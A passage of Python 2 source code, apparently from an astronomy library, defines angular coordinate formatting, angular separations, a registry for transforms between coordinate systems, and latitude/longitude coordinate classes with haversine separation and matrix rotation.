* 0: Angle values are coerced to lie in the range (default for
2-sequence if upper-lower is 360 degrees)
* None: A :exc:`ValueError` will be raised if out-of-range (default for
2-sequence otherwise)
* A positive scalar: Values are coerced in a triangle wave scheme, with
the scalar specifying the period. e.g. for the latitude, (-90,90,360)
would give the correct behavior)
""")
def __str__(self):
return self.getDmsStr(sep=('d',"'",'"'))
def __eq__(self,other):
if hasattr(other,'_decval'):
return self._decval==other._decval
else:
return self._decval==other
def __ne__(self,other):
return not self.__eq__(other)
def __add__(self,other):
if hasattr(other,'_decval'):
res = self.__class__()
res._decval = self._decval + other._decval
else:
res = self.__class__()
res._decval = self._decval + other
return res
def __sub__(self,other):
if isinstance(other,AngularCoordinate):
from math import degrees
res = AngularSeparation(degrees(other._decval),degrees(self._decval))
else:
res = AngularCoordinate()
res._decval = self._decval - other
return res
def __mul__(self,other):
res = self.__class__()
res._decval = self._decval*other
return res
def __div__(self,other):
res = self.__class__()
res._decval = self._decval/other
return res
def __truediv__(self,other):
res = self.__class__()
res._decval = self._decval//other
return res
def __pow__(self,other):
res = self.__class__()
res._decval = self._decval**other
return res
def __float__(self):
return self.degrees
def getDmsStr(self,secform='%05.2f',sep=(unichr(176),"'",'"'), sign=True,
canonical=False, inclzero=True):
"""
Generates the string representation of this AngularCoordinate as
degrees, arcminutes, and arcseconds.
:param secform: a formatter for the seconds
:type secform: string
:param sep:
The seperator between components - defaults to degree sign, ' and "
symbols.
:type sep: string or 3-tuple of strings
:param sign: Forces sign to be present before degree component.
:type sign: boolean
:param canonical: forces [+/-]dd:mm:ss.ss , overriding other arguments
:param inclzero:
If True, a "0" is included whenever even if the degrees or minutes
are 0. Otherise, the "0" and the corresponding separator are
omitted from the string.
:type inclzero: bool
:returns: String representation of this object.
"""
d,m,s = self.degminsec
if canonical:
secform = '%05.2f'
sep = (':',':','')
sign = True
s = secform%s
if int(float(s))>=60:
s = secform%0
m += 1
if m==60:
m = 0
d += 1
d,m=str(abs(d)),str(m)
if isinstance(sep,basestring):
if sep == 'dms':
sep = ('d','m','s')
sep = (sep,sep)
tojoin = []
if sign and self._decval >= 0:
tojoin.append('+')
if self._decval<0:
tojoin.append('-')
if inclzero or d is not '0':
tojoin.append(d)
tojoin.append(sep[0])
if inclzero or m is not '0':
tojoin.append(m)
tojoin.append(sep[1])
tojoin.append(s)
if len(sep)>2:
tojoin.append(sep[2])
return ''.join(tojoin)
def getHmsStr(self,secform = None,sep = ('h','m','s'), canonical = False,
inclzero=True):
"""
gets the string representation of this AngularCoordinate as hours,
minutes, and seconds
secform is the formatter for the seconds component
sep is the seperator between components - defaults to h, m, and s
canonical forces [+/-]dd:mm:ss.ss , overriding other arguments
Generates the string representation of this AngularCoordinate as hours,
minutes, and seconds.
:param secform: a formatter for the seconds component
:type secform: string
:param sep:
The seperator between components - defaults to 'h', 'm', and 's'.
:type sep: string or 3-tuple of strings
:param canonical: forces [+/-]dd:mm:ss.ss , overriding other arguments
:param inclzero:
If True, a "0" is included whenever even if the degrees or minutes
are 0. Otherise, the "0" and the corresponding separator are
omitted from the string.
:type inclzero: bool
:returns: String representation of this object.
"""
h,m,s = self.hrsminsec
if canonical:
secform = '%05.2f'
sep = (':',':','')
s = str(s) if secform is None else secform % s
#this is for the s=60 case
if int(float(s))>=60:
news = float(s) - 60
s = str(news) if secform is None else secform%news
m += 1
if m==60:
m = 0
h += 1
if h==24:
h = 0
h,m=str(h),str(m)
if isinstance(sep,basestring):
if sep == 'hms':
sep = ('h','m','s')
sep = (sep,sep)
tojoin = []
if inclzero or h is not '0':
tojoin.append(h)
tojoin.append(sep[0])
if inclzero or m is not '0':
tojoin.append(m)
tojoin.append(sep[1])
tojoin.append(s)
if len(sep)>2:
tojoin.append(sep[2])
return ''.join(tojoin)
class AngularSeparation(AngularCoordinate):
"""
This class represents a separation between two angular coordinates on the
unit sphere.
A constructor is available, but the most natural way to generate this object
is to use the subtraction (-) operator on two :class:`AngularCoordinate`
objects or two :class:`LatLongCoordinates` objects.
"""
def __init__(self,*args):
"""
Input arguments can be either:
* AngularSeparation(:class:`AngularSeparation` object)
Generates a copy of the provided object.
* AngularSeparation(sep)
Generates a separation of the provided distance with no starting point.
* AngularSeparation(start,end)
Computes the separation from the start and end objects, which must
be :class:`AngularCoordinate` objects.
"""
if len(args) == 1:
a = args[0]
if a.__class__ == self.__class__:
self._decval = args[0]._decval
self._range = args[0]._range
return
sep = a._decval if hasattr(a,'_decval') else a
elif len(args) == 2:
a0,a1 = args
a0 = a0._decval if hasattr(a0,'_decval') else a0
a1 = a1._decval if hasattr(a1,'_decval') else a1
sep = a1 - a0
else:
raise ValueError('improper number of inputs to AngularSeparation')
AngularCoordinate.__init__(self,sep)
def __add__(self,other):
if isinstance(other,AngularCoordinate) and not self.__class__ == other.__class__:
res = AngularCoordinate()
res._decval = self._decval+other._decval
return res
else:
return AngularCoordinate.__add__(self,other)
#comparisons
def __lt__(self,other):
return self._decval < other._decval
def __le__(self,other):
return self._decval <= other._decval
def __gt__(self,other):
return self._decval > other._decval
def __ge__(self,other):
return self._decval >= other._decval
def __eq__(self,other):
return self._decval == other._decval
def __ne__(self,other):
return self._decval != other._decval
def _getArcsec(self):
return self.degrees*3600
def _setArcsec(self,val):
self.degrees = val/3600
arcsec = property(_getArcsec,_setArcsec,doc=None)
def _getArcmin(self):
return self.degrees*60
def _setArcmin(self,val):
self.degrees = val/60
arcmin = property(_getArcmin,_setArcmin,doc=None)
def projectedSeparation(self,zord,usez=False,**kwargs):
"""
Computes the physical projected separation assuming a given distance.
kwargs are passed into :func:`cosmo_z_to_dist` if `usez` is True.
:param zord: Redshift or distance
:type zord: scalar number
:param usez:
If True, the input will be interpreted as a redshift, and kwargs
will be passed into the distance calculation. The result will be in
pc. Otherwise, `zord` will be interpreted as a distance.
:type usez: boolean
:returns: a float value for the separation (in pc if redshift is used)
"""
from .funcs import angular_to_physical_size
return angular_to_physical_size(self.arcsec,zord,usez=usez,**kwargs)
def separation3d(self,zord1,zord2,usez=False,**kwargs):
"""
computes the 3d separation assuming the two points at the ends of this
:class:`AngularSeparation` are at the distances `zord1` and `zord2`.
:param zord1: Redshift or distance for start point
:type zord1: scalar number
:param zord2: Redshift or distance for end point
:type zord2: scalar number
:param usez:
If True, the inputs will be interpreted as a redshift, and kwargs
will be passed into the distance calculation. The result will be in
pc. Otherwise, `zord` will be interpreted as a distance.
:type usez: boolean
:returns: a float value for the separation (in pc if redshift is used)
"""
from math import sin,cos,sqrt
if usez:
d1 = cosmo_z_to_dist(zord1,disttype=2,**kwargs)*1e6 #pc
d2 = cosmo_z_to_dist(zord1,disttype=2,**kwargs)*1e6 #pc
else:
if len(kwargs)>0:
raise TypeError('if not using redshift, kwargs should not be provided')
d1 = zord1
d2 = zord2
costerm = 2*d1*d2*cos(self._decval)
return sqrt(d1*d1+d2*d2-costerm)
#<-----------------------------Coordinate systems------------------------------>
class _CoosysMeta(ABCMeta):
"""
Metaclass for CoordinateSystem class and subclasses - needed to support
:class:`CoordinateSystem.registerTransform` decorator.
"""
def __init__(cls,name,bases,dct):
ABCMeta.__init__(cls,name,bases,dct)
import inspect
for k,v in inspect.getmembers(cls):
if isinstance(v,_TransformerMethodDeco):
for vfc,vtc in zip(v.fromclasses,v.toclasses):
fromclass = cls if vfc == 'self' else vfc
toclass = cls if vtc == 'self' else vtc
CoordinateSystem.registerTransform(fromclass,toclass,v.f,v.transtype)
setattr(cls,k,staticmethod(v.f))
class _TransformerMethodDeco(object):
"""
A class representing methods used for registering transforms for the class
the are in.
"""
def __init__(self,f,fromclass,toclass,transtype=None):
self.f = f
self.fromclasses = [fromclass]
self.toclasses = [toclass]
self.transtype = transtype
#Default for optmizing convert functions - currently false because it's not smart enough
_convertoptimizedefault = False
class CoordinateSystem(object):
"""
Base class of all coordinate systems. This class also holds the static
methods that manage conversion between coordinate systems.
*Subclassing*
* Subclasses of :class:`CoordinateSystem` must override :meth:`__init__` to
set initial values.
* :class:`CoordinateSystem` objects are intended to be quite small, so
unless there is a reason to do otherwise, subclasses should have a
:attr:`__slots__` class attribute (it should be a sequence of all the
valid attribute names for the object - see
http://docs.python.org/reference/datamodel.html for an explanation of the
`__slots__` mechanism).
* The :attr:`transweight` class variable can be set to determine the
weighting of this class when computing coordinate transformation pathways.
Note that *smaller* weights are preferred paths (e.g. a larger weight is
less likely to be visited). See
:meth:`CoordinateSystem.getTransformGraph` for more details.
"""
from collections import defaultdict as _defaultdict
__metaclass__ = _CoosysMeta
__slots__ = tuple()
@abstractmethod
def __init__(self):
raise NotImplementedError
_converters = _defaultdict(dict) #first index is from, second is to
_transtypes = dict()
@staticmethod
def registerTransform(fromclass,toclass,func=None,transtype=None,
overwrite=True):
"""
Register a function to transform coordinates from one system to another.
The transformation function is called is func(fromobject) and should
return a new object of type `toclass`. If called with no arguments,
the function should raise a :exc:`NotImplementedError` or behave in a
manner defined in subclasses (see e.g. :class:`LatLongCoordinates`).
If `transtype` is not None, the output of the transformation function is
filered through the function applied for that type using
:meth:`astropysics.CoordinateSystem.addTransType` .
If the transformation function `func` is None, the function is taken to
be a decorator, and if it is a method of a subclass of
:class:`CoordinateSystem`, `fromclass` or `toclass` may be the string
'self' . In this case, the function will use the class itself as the
from or to class. The function will then be treated as a static method
(e.g. it should not have `self` as the first argument).
:param fromclass: The class to transform from.
:type fromclass: subclass of :class:`CoordinateSystem` or 'self'
:param toclass: The class to transform to.
:type toclass: subclass of :class:`CoordinateSystem` or 'self'
:param func: the function to perform the transform or None if decorator.
:type func: a callable or None
:param transtype:
A transformation type that will be used to determine how the
transform is performed, or None for no transform type. (see
:meth:`astropysics.CoordinateSystem.addTransType` for details).
:type transtype: string or None
:param overwrite:
If True, any already existing function will be silently overriden.
Otherwise, a ValueError is raised.
:type overwrite: boolean
**Examples**::
class MyCoordinates(CoordinateSystem):
...
class YourCoordinates(CoordinateSystem):
...
def transformer(mycooobj):
...
return yourcoordobj
CoordinateSystem.registerTransform(MyCoordinates,YourCoordinates,transformer)
class TheirCoordinates(CoordinateSystem):
@CoordinateSystem.registerTransform(MyCoordinates,'self')
@classmethod
def fromMy(cls,mycoordinates):
...
return theircoordobj
"""
if func is None:
if fromclass != 'self':
if not issubclass(fromclass,CoordinateSystem):
raise TypeError('from class for registerTransform must be a CoordinateSystem')
if toclass != 'self':
if not issubclass(toclass,CoordinateSystem):
raise TypeError('to class for registerTransform must be a CoordinateSystem')
def make_or_extend_trans_meth_deco(f):
if isinstance(f,_TransformerMethodDeco):
f.fromclasses.append(fromclass)
f.toclasses.append(toclass)
elif callable(f):
return _TransformerMethodDeco(f,fromclass,toclass,transtype)
else:
raise TypeError('Tried to apply registerTransform to a non-callable')
return make_or_extend_trans_meth_deco
else:
if not issubclass(fromclass,CoordinateSystem) or not issubclass(toclass,CoordinateSystem):
raise TypeError('to/from classes for registerTransform must be CoordinateSystems')
if not overwrite and (toclass in CoordinateSystem._converters[fromclass]):
#format requires 2.6
#raise ValueError('function already exists to convert {0} to {1}'.format(fromclass,toclass))
raise ValueError('function already exists to convert %s to %s'%(fromclass,toclass))
if transtype is not None:
try:
ttf = CoordinateSystem._transtypes[transtype]
except KeyError:
raise KeyError('coordinate transformation type %s does not exist'%transtype)
lfunc = lambda cobj:ttf(func(cobj),cobj,toclass)
lfunc.basetrans = func
lfunc.transtype = transtype
CoordinateSystem._converters[fromclass][toclass] = lfunc
else:
func.transtype = None
CoordinateSystem._converters[fromclass][toclass] = func
CoordinateSystem._invalidateTransformCache()
@staticmethod
def getTransform(fromclass,toclass):
"""
Returns the transformation function to go from `fromclass` to `toclass`.
"""
return CoordinateSystem._converters[fromclass][toclass]
@staticmethod
def listAllTransforms():
"""
Returns a list of 2-tuples (fromclass,toclass) of all the coordinate
system combinations that have registered transformation functions.
"""
trlist = []
for fr,l in CoordinateSystem._converters.iteritems():
for li in l:
trlist.append((fr,li))
return trlist
@staticmethod
def listTransformsTo(toclass):
"""
Returns a list of classes that can be transformed to the supplied class.
"""
flist = []
for fr,l in CoordinateSystem._converters.iteritems():
for li in l:
if li is toclass:
flist.append(fr)
return flist
@staticmethod
def listTransformsFrom(fromclass):
"""
Returns a list of classes that can be transformed from the supplied
class.
"""
if fromclass in CoordinateSystem._converters:
return list(CoordinateSystem._converters[fromclass])
else:
return []
@staticmethod
def delTransform(fromclass,toclass):
"""
Deletes the transformation function to go from `fromclass` to `toclass`.
"""
del CoordinateSystem._converters[fromclass][toclass]
CoordinateSystem._invalidateTransformCache()
@staticmethod
def addTransType(funcorname):
"""
Registers a new transformation type. Transformation types are used to
implement particular types of transformations without repeating similar
code in each of the actual transformation functions.
The transformation type function (`funcorname`) will be called as
transfunc(trans,coords,toclass), where trans is the output of the actual
registered transformation function, coords is the coordinate object that
is being converted, and toclass is the target class.
:param funcorname:
The function to register as the transfromation type function. If a
string, the string is taken to be the name to use for the
transformation (intended for use as a function decorator).
Otherwise, the transformation type name is taken from the name of
the function with any intial _ removed.
:type funcorname: callable or string
:returns:
The function itself, to allow for use as a decorator. Note that this
means that if used as a decorator inside a class, the function will
be assigned as an *instance* method. Alternative, if `funcorname`
is a string, a function to be called on the transformation function
will be returned (see second example).
**Examples**::
@addTransType
def trans1(trans,coord,tocls):
return tocls(trans*coord.val)
@addTransType('trans1')
def _transfunc(trans,coord,tocls):
return tocls(trans*coord.val)
"""
def regtrans(func,typename):
if typename in CoordinateSystem._transtypes:
#go through and re-assign all existing transes to use the new one
for k,v in CoordinateSystem._converters.iteritems():
for k2,v2 in v.items():
if v2.transtype == typename:
btfunc = v2.basetrans
coof = lambda cobj:func(btfunc(cobj),cobj,k2)
coof.transtype = typename
coof.basetrans = btfunc
CoordinateSystem._converters[k][k2] = coof
CoordinateSystem._transtypes[typename] = func
return func
if isinstance(funcorname,basestring):
typename = funcorname
return lambda f:regtrans(f,typename)
elif callable(funcorname):
typename = funcorname.func_name
if typename.startswith('_'):
typename = typename[1:]
return regtrans(funcorname,typename)
else:
raise TypeError('funcorname is neither a callable nor a string')
@staticmethod
def getTransformPath(fromsys,tosys):
"""
Determines the transformation path from one coordinate system to another
for use with :meth:`convert`.
:param fromsys: The starting coordinate system class
:param tosys: The target coordinate system class
:returns:
A list of coordinate classes with the shortest path from `fromsys`
to `tosys` (*including* `fromsys` and `tosys`) or a callable with
the transformation if a single-step direct transformation is
available
:except NotImplementedError: If no path can be found.
"""
if tosys in CoordinateSystem._converters[fromsys]:
return CoordinateSystem._converters[fromsys][tosys]
else:
failstr = 'cannot convert coordinate system %s to %s'%(fromsys.__name__,tosys.__name__)
try:
import networkx as nx
g = CoordinateSystem.getTransformGraph()
if nx.__version__>'1.4':
path = nx.shortest_path(g,fromsys,tosys,weight=True)
else:
path = nx.shortest_path(g,fromsys,tosys,weighted=True)
if not path:
raise NotImplementedError(failstr+'; no transform path could be found')
return path
except ImportError,e:
if e.args[0] == 'No module named networkx':
raise NotImplementedError(failstr+'; networkx not installed')
else:
raise
_transgraph = None
@staticmethod
def getTransformGraph():
"""
Returns a `networkx <http://networkx.lanl.gov/>` :class:`DiGraph` object
representing a graph of the registered coordinate systems and the
transformations between them.
:except ImportError: If networkx is not installed.
"""
import networkx as nx
if CoordinateSystem._transgraph is None:
CoordinateSystem._transgraph = g = nx.DiGraph()
transes = []
for a,b in CoordinateSystem.listAllTransforms():
avgweight = (getattr(a,'transweight',1) +
getattr(b,'transweight',1))/2
transes.append((a,b,dict(weight=avgweight)))
g.add_edges_from(transes)
return CoordinateSystem._transgraph.copy()
_transformcache = _defaultdict(dict)
@staticmethod
def _invalidateTransformCache():
"""
Called when transforms are changed to invalidate the caches
"""
from collections import defaultdict
CoordinateSystem._transformcache = defaultdict(dict)
CoordinateSystem._transgraph = None
def convert(self,tosys):
"""
converts the coordinate system from it's current system to a new
:class:`CoordinateSystem` object.
:param tosys:
The new coordinate system class. Should be a subclass of
:class:`CoordinateSystem` .
:returns: A new object of a class determined by `tosys`
:except: raises :exc:`NotImplementedError` if conversion is not present
"""
convpath = CoordinateSystem.getTransformPath(self.__class__,tosys)
if callable(convpath):
return convpath(self)
else:
currobj = self
currsys = self.__class__
for intersys in convpath[1:-1]:
currobj = CoordinateSystem._converters[currsys][intersys](currobj)
currsys = intersys
return CoordinateSystem._converters[currsys][tosys](currobj)
class EpochalCoordinates(CoordinateSystem):
"""
A base class for :class:`CoordinateSystem` classes that have *changeable*
epochs associated with them.
*Subclassing*
Subclasses must implement these methods:
* :meth:`__init__` from :class:`CoordinateSystem`
* :meth:`transformToEpoch` -- see the method's entry for details.
Furthermore, subclasses should set :attr:`julianepoch` to determine if they
are Julian or Besselian.
"""
#TODO:figure out if there's a way to put this back in to save space - right
#now if two __slots__ classes are mixed together, this is thrown:
#TypeError: Error when calling the metaclass bases multiple bases have instance lay-out conflict
#__slots__ = ('_epoch',)
julianepoch = True
"""
If True, the epoch is Julian, otherwise, Besselian
"""
def __getstate__(self):
return {'_epoch':self._epoch}
def __setstate__(self,d):
self._epoch = d['_epoch']
def _getEpoch(self):
return self._epoch
def _setEpoch(self,val):
if val is None:
self._epoch = None
else:
if val == 'now':
from ..obstools import jd_to_epoch
val = jd_to_epoch(None,self.julianepoch)
if not hasattr(self,'_epoch') or self._epoch is None:
self._epoch = float(val)
else:
self.transformToEpoch(float(val))
epoch = property(_getEpoch,_setEpoch,doc="""
Epoch for this coordinate as a float.
Setting with the string 'now' will set the epoch to the time at the moment
the command is executed.
If set, this coordinate will be transformed to the new epoch, unless the
current Epoch is None, in which case the epoch will be set with no
transformation. If transformation is *not* desired, first set the epoch to
None, and then set to the new epoch.
Julian vs. Besselian is determined by the :attr:`julianepoch` attribute.
""")
def _getEpochstr(self):
#format requires 2.6
#return '{0}{1}'.format('J' if self.julianepoch else 'B',self._epoch)
if self._epoch is None:
return ''
else:
return '%s%s'%('J' if self.julianepoch else 'B',self._epoch)
def _setEpochstr(self,val):
self.epoch = val
epochstr = property(_getEpochstr,_setEpochstr,doc="""
A string representation of the epoch of this object with a J or B prefixed
for julian or besselian epochs.
""")
def _getJdepoch(self):
from ..obstools import epoch_to_jd
return epoch_to_jd(self._epoch,self.julianepoch)
def _setJdepoch(self,val):
from ..obstools import jd_to_epoch
self._epoch = jd_to_epoch(val,self.julianepoch)
jdepoch = property(_getJdepoch,_setJdepoch,doc="""
Julian Date of the epoch for this object.
""")
def _getMjdepoch(self):
from ..obstools import epoch_to_jd
return epoch_to_jd(self._epoch,self.julianepoch,mjd=True)
def _setMjdepoch(self,val):
from ..obstools import jd_to_epoch
self._epoch = jd_to_epoch(val,self.julianepoch,mjd=True)
mjdepoch = property(_getMjdepoch,_setMjdepoch,doc="""
Modified Julian Date of the epoch for this object.
""")
@abstractmethod
def transformToEpoch(self,newepoch):
"""
Subclasses should implement this method to transform their coordinates
to a new epoch. At the end of this method after the necessary data
transformations are performed, subclasses should call
``EpochalCoordinates.transformToEpoch(newepoch)``.
"""
self._epoch = newepoch
class RectangularCoordinates(CoordinateSystem):
"""
Rectangular/Cartesian Coordinates in three dimensions. Coordinates are
accessed via the attributes :attr:`x`, :attr:`y`, and :attr:`z`.
"""
__slots__ = ('x','y','z')
def __init__(self,x,y,z):
#: x cartesian coordinate value
self.x = x
#: y cartesian coordinate value
self.y = y
#: z cartesian coordinate value
self.z = z
def __getstate__(self):
#TODO: watch if this creates probelms by not being a dict
return dict(x=self.x,y=self.y,z=self.z)
def __setstate__(self,d):
self.x = d['x']
self.y = d['y']
self.z = d['z']
def __str__(self):
return '%s: x=%f,y=%f,z=%f'%(self.__class__.__name__,self.x,self.y,self.z)
def __add__(self,other):
from copy import deepcopy
if hasattr(other,'x') and hasattr(other,'y') and hasattr(other,'z'):
new = deepcopy(self)
new.x = self.x+other.x
new.y = self.y+other.y
new.z = self.z+other.z
return new
raise TypeError('Object of type %s does not have x,y, and z for operand +'%other.__class__)
def __sub__(self,other):
from copy import deepcopy
if hasattr(other,'x') and hasattr(other,'y') and hasattr(other,'z'):
new = deepcopy(self)
new.x = self.x-other.x
new.y = self.y-other.y
new.z = self.z-other.z
return new
raise TypeError('Object of type %s does not have x,y, and z for operand -'%other.__class__)
def _getLength(self):
from math import sqrt
return sqrt(self.x**2+self.y**2+self.z**2)
def _setLength(self,val):
scaling = val/self._getLength()
self.x *= scaling
self.y *= scaling
self.z *= scaling
length = property(_getLength,_setLength,doc="""
The Length of this coordinate's vector e.g. distance from the origin. If
set, the direction will be preserved but the vector will be scaled to the
provided value.""")
CartesianCoordinates = RectangularCoordinates
class _LatLongMeta(_CoosysMeta):
def __init__(cls,name,bases,dct):
_CoosysMeta.__init__(cls,name,bases,dct)
if cls._longlatnames_[0] is not None:
setattr(cls,cls._longlatnames_[0],cls.long)
setattr(cls,cls._longlatnames_[0]+'err',cls.longerr)
if cls._longlatnames_[1] is not None:
setattr(cls,cls._longlatnames_[1],cls.lat)
setattr(cls,cls._longlatnames_[1]+'err',cls.laterr)
class LatLongCoordinates(CoordinateSystem):
"""
This object represents an angular location on a sphere as represented in
spherical coordinates with a latitude and longitude, and optionally a
distance. Subclasses specify details such as transformations or epochs.
A :class:`LatLongCoordinate` system is designed to use the transformation
type (see :meth:`CoordinateSystem.addTransType`) 'smatrix'. Thus, if the
transformation between two :class:`LatLongCoordinate` subclasses can be
represented as a unitary matrix operating on position vectors on the unit
sphere, the transformation function can be written as::
@CoordinateSystem.registerTransform(InLLCoords,OutLLCoords,transtype='smatrix')
def transform(incoord):
... compute the elements of a 3x3 transformation matrix...
return np.mat([[a,b,c],[d,e,f],[g,h,i]])
*Subclassing*
Subclasses of :class:`LatLongCoordinates` can have the class attribute
:attr:`_longlatnames_` as a 2-tuple of strings (longname,latname), with
names for the two coordinates, e.g. ('ra','dec'). They can also include the
:attr:`_longrange_` attribute, which specifies the range of valid values for
the longitude (latitude is always -90 to 90 degrees), or None to place no
restriction. See :class:`CoordinateSystem` for additional subclassing
information.
"""
__slots__ = ('_lat','_long','_laterr','_longerr','_dpc')
__metaclass__ = _LatLongMeta
_longlatnames_ = ('longitude','latitude')
_longrange_ = None
def __init__(self,long=0,lat=0,longerr=None,laterr=None,distancepc=None):
"""
See the associated attribute docstrings for the meaning of the inputs.
"""
self._lat = AngularCoordinate(range=(-90,90,360))
self._long = AngularCoordinate(range=self._longrange_)
self.distancepc = distancepc
if hasattr(lat,'lat') and hasattr(lat,'long'):
if long is 0 and laterr is None and longerr is None:
self.lat = lat.lat
self.long = lat.long
self.laterr = lat.laterr
self.longerr = lat.longerr
else:
raise ValueError("can't provide a LatLongCoordinates as a constructor and set other values simultaneously")
else:
self.lat = lat
self.long = long
self.laterr = laterr
self.longerr = longerr
def __getstate__(self):
return dict([(k,getattr(self,k)) for k in LatLongCoordinates.__slots__])
def __setstate__(self,d):
for k in LatLongCoordinates.__slots__:
setattr(self,k,d[k])
def _getDistancepc(self):
if callable(self._dpc):
return self._dpc()
else:
return self._dpc
def _setDistancepc(self,val):
if val is None:
self._dpc = None
elif callable(val):
self._dpc = val
else:
try:
self._dpc = (float(val[0]),float(val[1]))
except (TypeError,IndexError):
self._dpc = (float(val),0)
distancepc = property(_getDistancepc,_setDistancepc,doc="""
Parallax distance to object in parsecs, or None to assume infinity. Set as
either a float, a 2-tuple (distance,distance_error), or a no-argument
callable that returns such a tuple. Getter always returns 2-tuple or None.
""")
def _getDistanceau(self):
from ..constants import aupercm,cmperpc
auperpc = cmperpc * aupercm
if self._dpc is None:
return None
elif callable(self._dpc):
res = self._dpc()
else:
res = self._dpc
return (res[0]*auperpc,res[1]*auperpc)
def _setDistanceau(self,val):
from ..constants import cmperau,pcpercm
pcperau = cmperau * pcpercm
if val is None:
self._dpc = None
elif callable(val):
self._dpc = lambda: tuple((v*pcperau for v in val()))
else:
try:
self._dpc = (float(val[0])*pcperau,float(val[1])*pcperau)
except (TypeError,IndexError):
self._dpc = (float(val)*pcperau,0)
distanceau = property(_getDistanceau,_setDistanceau,doc="""
Parallax distance to object in AU, or None to assume infinity. Set as either
a float, a 2-tuple (distance,distance_error), or a no-argument callable that
returns such a tuple. Getter always returns 2-tuple or None.
""")
def _getLat(self):
return self._lat
def _setLat(self,val):
if isinstance(val,AngularCoordinate):
rads = val.radians%_twopi
else:
rads = AngularCoordinate(val).radians%_twopi
#fix for radian range
if rads > 3*pi/2:
rads -= _twopi
elif rads > pi/2:
rads = pi - rads
self._lat.radians = rads
lat = property(_getLat,_setLat,doc="""
Latitude of this object as a :class:`AngularCoordinate` object. May be set
using any valid input form for :class:`AngularCoordinate`.
""")
def _getLong(self):
return self._long
def _setLong(self,val):
if isinstance(val,AngularCoordinate):
self._long.radians = val.radians%_twopi
else:
self._long.radians = AngularCoordinate(val).radians%_twopi
long = property(_getLong,_setLong,doc="""
Longitude of this object as a :class:`AngularCoordinate` object. May be set
using any valid input form for :class:`AngularCoordinate`.
""")
def _getLaterr(self):
return self._laterr
def _setLaterr(self,val):
if val is None:
self._laterr = None
elif isinstance(val,AngularSeparation):
self._laterr = val
else:
self._laterr = AngularSeparation(val)
laterr = property(_getLaterr,_setLaterr,doc="""
Latitude error for this object as a :class:`AngularSeparation` object. May
be set using any valid input form for :class:`AngularSeparation`.
""")
def _getLongerr(self):
return self._longerr
def _setLongerr(self,val):
if val is None:
self._longerr = None
elif isinstance(val,AngularSeparation):
self._longerr = val
else:
self._longerr = AngularSeparation(val)
longerr = property(_getLongerr,_setLongerr,doc="""
Longitude error for this object as a :class:`AngularSeparation` object. May
be set using any valid input form for :class:`AngularSeparation`.
""")
def __str__(self):
lat,long = self._lat.d,self._long.d
#lat,long = self._lat.getDmsStr(),self._long.getDmsStr()
#this requires 2.6 - switch later maybe
#return '{0}: {1[0]}={2},{1[1]}={3}'.format(self.__class__.__name__,self._longlatnames_,long,lat)
return '%s: %s=%f,%s=%f'%(self.__class__.__name__,self._longlatnames_[0],long,self._longlatnames_[1],lat)
def getCoordinateString(self,sep=' ',labels=False,canonical=False,hmslong=False):
coords = []
if hmslong:
coords.append(self._long.getHmsStr(canonical=canonical,sign=False))
else:
coords.append(self._long.getDmsStr(canonical=canonical,sign=False))
coords[-1] = self._longlatnames_[0]+'='+coords[-1]
coords.append(self._lat.getDmsStr(canonical=canonical))
coords[-1] = self._longlatnames_[1]+'='+coords[-1]
return sep.join(coords)
def __eq__(self,other):
if hasattr(other,'lat') and hasattr(other,'long'):
return self._lat==other.lat and self._long==other.long
else:
return False
def __ne__(self,other):
return not self.__eq__(other)
def __sub__(self,other):
if isinstance(other,LatLongCoordinates) or (hasattr(other,'lat') and hasattr(other,'long')):
from math import cos,degrees,acos,asin,sin,sqrt
b1 = self._lat.radians
b2 = other.lat.radians
db = abs(b2 - b1)
dl = abs(other.long.radians - self._long.radians)
#haversin(theta) = (1-cos(theta))/2 = sin^2(theta/2)
#has better numerical accuracy if sin for theta ~ 0, cos ~ pi/2
haversin = lambda t:(1-cos(t))/2 if pi/4 < (t%pi) < 3*pi/4 else sin(t/2)**2
hdb = haversin(db)
hdl = haversin(dl)
havsep = hdb + cos(b1)*cos(b2)*hdl
#archaversin
sep = acos(1 - 2*havsep) if 0.25 < havsep <= 0.75 else 2*asin(havsep**0.5)
#straightforward definition without the tweaks using haversin - this
#is in principal faster, but in practice it ends up only about
#10% faster due to the other overhead
#sep = acos(sin(b1)*sin(b2)+cos(b1)*cos(b2)*cos(dl))
return AngularSeparation(degrees(sep))
# #small angle version
# from math import cos,degrees,sqrt
# clat = cos((self._lat.radians+other._lat.radians)/2)
# dcorrlong = (self._long.radians - other._long.radians)*clat
# dlat = self._lat.radians-other._lat.radians
# sep = AngularSeparation(degrees(sqrt(dlat*dlat+dcorrlong*dcorrlong)))
# return sep
else:
raise ValueError("unsupported operand type(s) for -: '%s' and '%s'"%(self.__class__,other.__class__))
@staticmethod
@CoordinateSystem.addTransType
def _smatrix(m,coord,tocls):
newcoord = tocls()
newcoord.lat = coord._lat
newcoord.laterr = coord._laterr
newcoord.long = coord._long
newcoord.longerr = coord._longerr
newcoord.matrixRotate(m)
return newcoord
def matrixRotate(self,matrix,apply=True,fixrange=True,unitarycheck=False):
"""
Applies the supplied unitary rotation matrix to these coordinates.
:param matrix: the transformation matrix in cartesian coordinates
:type matrix: a 3x3 :class:`numpy.matrix`
:param apply:
If True, the transform will be applied inplace to the coordinates
for this object
:type apply: boolean
:param fixrange:
If True the latitude is autmoatically fixed to be on (-pi/2,pi/2)
and the longitude is on (0,2pi). Otherwise the raw coordinate is
output.
:type fixrange: boolean
:param unitarycheck:
If True and the matrix is not unitary, a ValueError will be raised.
Otherwise no check is performed.
:type unitarycheck: boolean
:returns:
(lat,long) as decimal radians after the transformation matrix is
applied or (lat,long,laterr,longerr) if errors are nonzero
"""
#for single values, math module is much faster than numpy
from math import sin,cos,atan2,sqrt
m = np.asmatrix(matrix)
if unitarycheck:
mdagger = m.H
rtol = 1e-5 if unitarycheck is True else unitarycheck
if not np.allclose(mdagger*m,m*mdagger,rtol):
raise ValueError('matrix not unitary')
lat = self.lat.radians
long = self.long.radians
laterr = 0 if self.laterr is None else self.laterr.radians
longerr = 0 if self.longerr is None else self.longerr.radians
sb = sin(lat)
cb = cos(lat)
sl = sin(long)
cl = cos(long)
#spherical w/ r=1 > cartesian
x = cb*cl
y = cb*sl
z = sb
#do transform
v = np.matrix((x,y,z)).T
xp,yp,zp = (m*v).A1
#cartesian > spherical
sp = sqrt(xp*xp+yp*yp) #cylindrical radius
latp = atan2(zp,sp)
longp = atan2(yp,xp)
#propogate errors if they are present
if laterr != 0 or longerr != 0:
#TODO: check formulae
#all of these are first order taylor expansions about the value
dx = sqrt((laterr*sb*cl)**2+(longerr*cb*sl)**2)
